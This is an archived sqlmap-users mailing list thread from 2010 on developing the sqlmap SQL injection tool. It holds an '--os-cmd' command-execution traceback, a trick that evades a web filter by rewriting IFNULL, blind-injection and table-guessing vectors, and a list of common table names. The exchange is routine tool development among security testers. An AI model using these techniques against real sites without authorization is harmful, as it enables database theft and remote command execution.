kind regards.

On Thu, Sep 30, 2010 at 7:30 PM, prashant jadhav
<pra...@gm...> wrote:
> hi ,
>  While testing the --os-cmd=ls in sqlmap 0.9 dev  i m getting the following
> error
>
>
> Please advice
> The details are
>
> URL = sudo python ./sqlmap.py -u "http://xxx/bbb.php?article_id=2322"
> --os-cmd=ls -v 1
>
>
> "
> [23:06:37] [CRITICAL] unhandled exception in sqlmap/0.9-dev, please copy the
> command line and the following text and send by e-mail to
> sql...@li.... The developer will fix it as soon as
> possible:
> sqlmap version: 0.9-dev
> Python version: 2.5.2
> Operating system: posix
> Traceback (most recent call last):
>   File "./sqlmap.py", line 95, in main
>     start()
>   File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line
> 280, in start
>     action()
>   File "/pentest/database/sqlmap-dev/lib/controller/action.py", line 152, in
> action
>     conf.dbmsHandler.osCmd()
>   File "/pentest/database/sqlmap-dev/plugins/generic/takeover.py", line 66,
> in osCmd
>     self.initEnv(web=web)
>   File "/pentest/database/sqlmap-dev/lib/takeover/abstraction.py", line 154,
> in initEnv
>     self.webInit()
>   File "/pentest/database/sqlmap-dev/lib/takeover/web.py", line 198, in
> webInit
>     uplPage, _  = Request.getPage(url=self.webUploaderUrl, direct=True,
> raise404=False)
>   File "/pentest/database/sqlmap-dev/lib/request/connect.py", line 174, in
> getPage
>     conn = urllib2.urlopen(req)
>   File "/usr/lib/python2.5/urllib2.py", line 124, in urlopen
>     return _opener.open(url, data)
>   File "/usr/lib/python2.5/urllib2.py", line 381, in open
>     response = self._open(req, data)
>   File "/usr/lib/python2.5/urllib2.py", line 399, in _open
>     '_open', req)
>   File "/usr/lib/python2.5/urllib2.py", line 360, in _call_chain
>     result = func(*args)
>   File "/usr/lib/python2.5/urllib2.py", line 1107, in http_open
>     return self.do_open(httplib.HTTPConnection, req)
>   File "/usr/lib/python2.5/urllib2.py", line 1064, in do_open
>     h = http_class(host) # will parse host:port
>   File "/usr/lib/python2.5/httplib.py", line 639, in __init__
>     self._set_hostport(host, port)
>   File "/usr/lib/python2.5/httplib.py", line 651, in _set_hostport
>     raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
> InvalidURL: nonnumeric port: '80jpma'
>
> [*] shutting down at: 23:06:37
> "
>
> ------------------------------------------------------------------------------
> Start uncovering the many advantages of virtual appliances
> and start using them to simplify application deployment and
> accelerate your shift to cloud computing.
> http://p.sf.net/sfu/novell-sfdev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

[sqlmap-users] Error while excecuting os-cmd in sqlmap 0.9

[prashant j. <pra...@gm...>]

hi ,
 While testing the --os-cmd=ls in sqlmap 0.9 dev  i m getting the following
error


Please advice
The details are

URL = sudo python ./sqlmap.py -u "http://xxx/bbb.php?article_id=2322"
--os-cmd=ls -v 1


"
[23:06:37] [CRITICAL] unhandled exception in sqlmap/0.9-dev, please copy the
command line and the following text and send by e-mail to
sql...@li.... The developer will fix it as soon as
possible:
sqlmap version: 0.9-dev
Python version: 2.5.2
Operating system: posix
Traceback (most recent call last):
  File "./sqlmap.py", line 95, in main
    start()
  File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line
280, in start
    action()
  File "/pentest/database/sqlmap-dev/lib/controller/action.py", line 152, in
action
    conf.dbmsHandler.osCmd()
  File "/pentest/database/sqlmap-dev/plugins/generic/takeover.py", line 66,
in osCmd
    self.initEnv(web=web)
  File "/pentest/database/sqlmap-dev/lib/takeover/abstraction.py", line 154,
in initEnv
    self.webInit()
  File "/pentest/database/sqlmap-dev/lib/takeover/web.py", line 198, in
webInit
    uplPage, _  = Request.getPage(url=self.webUploaderUrl, direct=True,
raise404=False)
  File "/pentest/database/sqlmap-dev/lib/request/connect.py", line 174, in
getPage
    conn = urllib2.urlopen(req)
  File "/usr/lib/python2.5/urllib2.py", line 124, in urlopen
    return _opener.open(url, data)
  File "/usr/lib/python2.5/urllib2.py", line 381, in open
    response = self._open(req, data)
  File "/usr/lib/python2.5/urllib2.py", line 399, in _open
    '_open', req)
  File "/usr/lib/python2.5/urllib2.py", line 360, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.5/urllib2.py", line 1107, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.5/urllib2.py", line 1064, in do_open
    h = http_class(host) # will parse host:port
  File "/usr/lib/python2.5/httplib.py", line 639, in __init__
    self._set_hostport(host, port)
  File "/usr/lib/python2.5/httplib.py", line 651, in _set_hostport
    raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
InvalidURL: nonnumeric port: '80jpma'

[*] shutting down at: 23:06:37
"

Re: [sqlmap-users] OT: MySQL IFNULL replacement

[Miroslav S. <mir...@gm...>]

interesting.

for example, we already have a similar switch --use-between for cases
when '>' are filtered in blind injections.

we could add a switch for this one like --use-isnull but i am not sure
if it will be ever used (except you :).

any suggestion is more than welcome.

kr

On Wed, Sep 29, 2010 at 9:55 PM, Carlos Gabriel Vergara
<car...@gm...> wrote:
> Hi again. A curious thing: i was working with a server that at some
> point started to throw 403 errors on some injection strings. Doing a
> lot of analisys, i've found out that the string "IFNULL" (MySQL dbms)
> was the problem. Don't know why... this is the first scenario like
> this that i come across. Maybe an apache mod? why this word and not
> another "bad" strings?
>
> So, to fix it, i take a little proxy script in python, captured the
> sqlmap request, and replaced:
>
> IFNULL(arg1, arg2)
>
> ...with...
>
> IF(ISNULL(arg1),arg2,arg1)
>
> ...and worked :)
>
> The apache server header was something like this:
>
> Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1
> mod_bwlimited/1.4 FrontPage/5.0.2.2635
>
> Found little info about that mods...
>
> Someone has the same issue on saw something like this before? This
> time i could bypass the problem because i was sure that the script was
> injectable ("nose" perhaps... no logic explanation), but i'm not sure
> to catch it in the future...
>
> Best regards,
>
> --
> --------8<--------
> Carlos Gabriel Vergara
> http://www.ThorSecurity.com.ar
>
> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
> -------->8--------
>
> ------------------------------------------------------------------------------
> Start uncovering the many advantages of virtual appliances
> and start using them to simplify application deployment and
> accelerate your shift to cloud computing.
> http://p.sf.net/sfu/novell-sfdev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

Re: [sqlmap-users] suggestion

[Miroslav S. <mir...@gm...>]

On Thu, Sep 30, 2010 at 12:52 PM, no-replay <su...@cl...> wrote:
> Better use information_schema.columns then information_schema.tables when
> altering schema, because there we can get tname too and sometimes admin
> block access to inf.sc.tables
note added. currently we use information_schema.tables for
fingerprinting and table retrieval on MySQL databases (no alteration).
we will consider adding this one too in case of need for failsafe.
>
>
> And for beter improvement in blind, I suggest to use -- >
> ascii(substring($bla,$bli,$blu))> $number
>
>
> Because 255 : 2 = 125  --- > 125 : 2 =62 ---- > this will be faster because
> we only find right number

we indeed already do this one. you can find it in
lib/techniques/blind/inference.py.


bye
>
>
>
>
>
>
>
> ------------------------------------------------------------------------------
> Start uncovering the many advantages of virtual appliances
> and start using them to simplify application deployment and
> accelerate your shift to cloud computing.
> http://p.sf.net/sfu/novell-sfdev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

Re: [sqlmap-users] Call for common table names

[Miroslav S. <mir...@gm...>]

ok. thanks for noting. if i get time i'll also do this one. right now
results from plain google search seem to be more than enough.

On Thu, Sep 30, 2010 at 2:02 PM, Andres Riancho
<and...@gm...> wrote:
> The script is cool, but my idea was to use google.com/codesearch , which
> will (most likely) give you more hits.
>
> Regards,
> --
> Andres Riancho
>
> El sep 29, 2010 7:36 p.m., "Miroslav Stampar" <mir...@gm...>
> escribió:
>
> it's a modification of one of my previous scripts. it uses mobile
> google search page because it doesn't have any limitations regarding
> time between two queries.
>
> On Wed, Sep 29, 2010 at 5:08 PM, Andres Riancho
>
> <and...@gm...> wrote:
>> I'm more interested in the script :)
>>
>> On Wed, Sep 29, 2010 at...
>
> --
>
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010...



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

[sqlmap-users] --common-exists and --exists

[Miroslav S. <mir...@gm...>]

Hi.

Well, basically this feature(s) is mostly done and tested on MySQL,
Oracle, PostgreSQL and Firebird. You can try it out by updating to the
latest version from our SVN repository.

1) if you just turn switch --common-exists it will use table entries
from ./txt/common-tables.txt
2) if you use switch --exists you have to also provide a filename with
a list of table names (newline separated) for program to use

Kind regards.

-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

Re: [sqlmap-users] Call for common table names

[Andres R. <and...@gm...>]

The script is cool, but my idea was to use google.com/codesearch , which
will (most likely) give you more hits.

Regards,
--
Andres Riancho

El sep 29, 2010 7:36 p.m., "Miroslav Stampar" <mir...@gm...>
escribió:

it's a modification of one of my previous scripts. it uses mobile
google search page because it doesn't have any limitations regarding
time between two queries.

On Wed, Sep 29, 2010 at 5:08 PM, Andres Riancho

<and...@gm...> wrote:
> I'm more interested in the script :)
>
> On Wed, Sep 29, 2010 at...
--

Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010...

[sqlmap-users] suggestion

[no-replay <su...@cl...>]

Better use information_schema.columns then information_schema.tables when
altering schema, because there we can get tname too and sometimes admin
block access to inf.sc.tables


And for beter improvement in blind, I suggest to use -- >
ascii(substring($bla,$bli,$blu))> $number


Because 255 : 2 = 125  --- > 125 : 2 =62 ---- > this will be faster because
we only find right number

Re: [sqlmap-users] Call for common table names

[Miroslav S. <mir...@gm...>]

it's a modification of one of my previous scripts. it uses mobile
google search page because it doesn't have any limitations regarding
time between two queries.

On Wed, Sep 29, 2010 at 5:08 PM, Andres Riancho
<and...@gm...> wrote:
> I'm more interested in the script :)
>
> On Wed, Sep 29, 2010 at 11:38 AM, Miroslav Stampar
> <mir...@gm...> wrote:
>> program is done. i've run it partially for first 40 pages of Google
>> results and will leave it to run for whole night for the rest.
>>
>> if someone is interested for the complete sorted list of pairs
>> (table_name, count) give me a private mail and i'll send it to you.
>>
>> kind regards.
>>
>> p.s. first ten are at this moment:
>>
>> users,20
>> user,14
>> comments,12
>> sessions,10
>> categories,10
>> customers,10
>> customer,10
>> orders,9
>> log,8
>> category,7
>>
>>
>> On Wed, Sep 29, 2010 at 2:27 PM, Miroslav Stampar
>> <mir...@gm...> wrote:
>>> to be honest, this is great idea :)
>>>
>>> i've tried it and it really shows some really cool stuff :)
>>>
>>> will do this because i am more than interested what will be the results.
>>>
>>> once again, great idea
>>>
>>> On Wed, Sep 29, 2010 at 2:24 PM, Andres Riancho
>>> <and...@gm...> wrote:
>>>> Maybe if you search google's codesearch for "create table ..." inside. sql
>>>> files and automate the result extraction you would get something really cool
>>>> :)
>>>>
>>>> Regards,
>>>> --
>>>> Andres Riancho
>>>>
>>>> El sep 29, 2010 9:21 a.m., "Miroslav Stampar" <mir...@gm...>
>>>> escribió:
>>>>
>>>> Hi.
>>>>
>>>> We are currently adding new feature into sqlmap for retrieving table
>>>> names when database (information_) schema is missing and/or sqlmap is
>>>> unable to extract table names via normal ways.
>>>>
>>>> Basic injection vector is: ...AND EXISTS(SELECT 1 FROM <table_name>)...
>>>>
>>>> So, if you have some knowledge to share please do.
>>>>
>>>> PHP, Joomla, Wordpress,... everything is more than welcome, except
>>>> database system tables. We have those more than enough ;)
>>>>
>>>> Bye.
>>>>
>>>> --
>>>> Miroslav Stampar
>>>>
>>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>>> Mobile: +385921010204 (HR 0921010204)
>>>> PGP Key ID: 0xB5397B1B
>>>> Location: Zagreb, Croatia
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Start uncovering the many advantages of virtual appliances
>>>> and start using them to simplify application deployment and
>>>> accelerate your shift to cloud computing.
>>>> http://p.sf.net/sfu/novell-sfdev2dev
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>>
>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>> Mobile: +385921010204 (HR 0921010204)
>>> PGP Key ID: 0xB5397B1B
>>> Location: Zagreb, Croatia
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>>
>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>> Mobile: +385921010204 (HR 0921010204)
>> PGP Key ID: 0xB5397B1B
>> Location: Zagreb, Croatia
>>
>
>
>
> --
> Andrés Riancho
> Founder, Bonsai - Information Security
> http://www.bonsai-sec.com/
> http://w3af.sf.net/
>



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

Re: [sqlmap-users] Call for common table names

[Miroslav S. <mir...@gm...>]

yea, for sure

On Wed, Sep 29, 2010 at 9:34 PM, Carlos Gabriel Vergara
<car...@gm...> wrote:
> I can contribute with spanish common table names... want 'em?
>
>
>
>
> 2010/9/29 Andres Riancho <and...@gm...>:
>> I'm more interested in the script :)
>>
>> On Wed, Sep 29, 2010 at 11:38 AM, Miroslav Stampar
>> <mir...@gm...> wrote:
>>> program is done. i've run it partially for first 40 pages of Google
>>> results and will leave it to run for whole night for the rest.
>>>
>>> if someone is interested for the complete sorted list of pairs
>>> (table_name, count) give me a private mail and i'll send it to you.
>>>
>>> kind regards.
>>>
>>> p.s. first ten are at this moment:
>>>
>>> users,20
>>> user,14
>>> comments,12
>>> sessions,10
>>> categories,10
>>> customers,10
>>> customer,10
>>> orders,9
>>> log,8
>>> category,7
>>>
>>>
>>> On Wed, Sep 29, 2010 at 2:27 PM, Miroslav Stampar
>>> <mir...@gm...> wrote:
>>>> to be honest, this is great idea :)
>>>>
>>>> i've tried it and it really shows some really cool stuff :)
>>>>
>>>> will do this because i am more than interested what will be the results.
>>>>
>>>> once again, great idea
>>>>
>>>> On Wed, Sep 29, 2010 at 2:24 PM, Andres Riancho
>>>> <and...@gm...> wrote:
>>>>> Maybe if you search google's codesearch for "create table ..." inside. sql
>>>>> files and automate the result extraction you would get something really cool
>>>>> :)
>>>>>
>>>>> Regards,
>>>>> --
>>>>> Andres Riancho
>>>>>
>>>>> El sep 29, 2010 9:21 a.m., "Miroslav Stampar" <mir...@gm...>
>>>>> escribió:
>>>>>
>>>>> Hi.
>>>>>
>>>>> We are currently adding new feature into sqlmap for retrieving table
>>>>> names when database (information_) schema is missing and/or sqlmap is
>>>>> unable to extract table names via normal ways.
>>>>>
>>>>> Basic injection vector is: ...AND EXISTS(SELECT 1 FROM <table_name>)...
>>>>>
>>>>> So, if you have some knowledge to share please do.
>>>>>
>>>>> PHP, Joomla, Wordpress,... everything is more than welcome, except
>>>>> database system tables. We have those more than enough ;)
>>>>>
>>>>> Bye.
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>>
>>>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>>>> Mobile: +385921010204 (HR 0921010204)
>>>>> PGP Key ID: 0xB5397B1B
>>>>> Location: Zagreb, Croatia
>>>>>
>>>>> ------------------------------------------------------------------------------
>>>>> Start uncovering the many advantages of virtual appliances
>>>>> and start using them to simplify application deployment and
>>>>> accelerate your shift to cloud computing.
>>>>> http://p.sf.net/sfu/novell-sfdev2dev
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sql...@li...
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>>
>>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>>> Mobile: +385921010204 (HR 0921010204)
>>>> PGP Key ID: 0xB5397B1B
>>>> Location: Zagreb, Croatia
>>>>
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>>
>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>> Mobile: +385921010204 (HR 0921010204)
>>> PGP Key ID: 0xB5397B1B
>>> Location: Zagreb, Croatia
>>>
>>
>>
>>
>> --
>> Andrés Riancho
>> Founder, Bonsai - Information Security
>> http://www.bonsai-sec.com/
>> http://w3af.sf.net/
>>
>> ------------------------------------------------------------------------------
>> Start uncovering the many advantages of virtual appliances
>> and start using them to simplify application deployment and
>> accelerate your shift to cloud computing.
>> http://p.sf.net/sfu/novell-sfdev2dev
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> --------8<--------
> Carlos Gabriel Vergara
> http://www.ThorSecurity.com.ar
>
> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
> -------->8--------
>
> ------------------------------------------------------------------------------
> Start uncovering the many advantages of virtual appliances
> and start using them to simplify application deployment and
> accelerate your shift to cloud computing.
> http://p.sf.net/sfu/novell-sfdev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

[sqlmap-users] OT: MySQL IFNULL replacement

[Carlos G. V. <car...@gm...>]

Hi again. A curious thing: i was working with a server that at some
point started to throw 403 errors on some injection strings. Doing a
lot of analisys, i've found out that the string "IFNULL" (MySQL dbms)
was the problem. Don't know why... this is the first scenario like
this that i come across. Maybe an apache mod? why this word and not
another "bad" strings?

So, to fix it, i take a little proxy script in python, captured the
sqlmap request, and replaced:

IFNULL(arg1, arg2)

...with...

IF(ISNULL(arg1),arg2,arg1)

...and worked :)

The apache server header was something like this:

Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1
mod_bwlimited/1.4 FrontPage/5.0.2.2635

Found little info about that mods...

Someone has the same issue on saw something like this before? This
time i could bypass the problem because i was sure that the script was
injectable ("nose" perhaps... no logic explanation), but i'm not sure
to catch it in the future...

Best regards,

-- 
--------8<--------
Carlos Gabriel Vergara
http://www.ThorSecurity.com.ar

PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
-------->8--------